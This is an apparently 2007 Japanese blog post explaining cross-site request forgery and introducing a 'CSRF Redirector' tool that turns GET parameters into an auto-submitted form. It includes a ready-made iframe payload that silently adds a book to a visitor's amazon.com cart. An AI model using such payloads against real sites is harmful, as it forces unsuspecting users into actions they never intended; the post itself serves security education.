スポンサーリンク

CSRF(Cross Site Request Forgeries、
クロスサイトリクエストフォージェリー) リダイレクタ
の紹介。

CSRFとは、ユーザが意図しないアクションをさせられてしまうこと。
具体的には、掲示板に勝手に書き込みをさせられたり、
ショッピングのカートに勝手に商品を入れられたり、
Webサービスのカレンダーに勝手に予定を入れられたり、
そういった、リクエストを勝手に送られてしまう。
mixiで発生した「ぼくはまちちゃん」騒動で広く知られるようになった。

CSRF Redirecor

XSS Post Forwarderの刺激を受けて作ったもの。
何をするかというと、GETのパラメータからフォームを作成し、
そのフォームをsubmitするJavaScriptを埋め込んだページを生成する
URLをiframeで読み込む。

下記のソースが含まれるページにアクセスすると、
アマゾン(amazon.comのほう)のカートに Essential PHP
Security の本を勝手に入れてしまう。
<iframe
src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf"
/>

参考
[2007-07-19] XSS Post Forwarder

XSS Post Forwarder のサイト
http://shiflett.org/blog/2007/jul/csrf-redirector

スポンサーリンク
スポンサーリンク
 
いつもシェア、ありがとうございます!


もっと情報を探しませんか?

関連記事

最近の記事

人気のページ

スポンサーリンク
 

過去ログ

2020 : 01 02 03 04 05 06 07 08 09 10 11 12
2019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12

サイト

Vim入門

C言語入門

C++入門

JavaScript/Node.js入門

Python入門

FreeBSD入門

Ubuntu入門

セキュリティ入門

パソコン自作入門

ブログ

トップ


プライバシーポリシー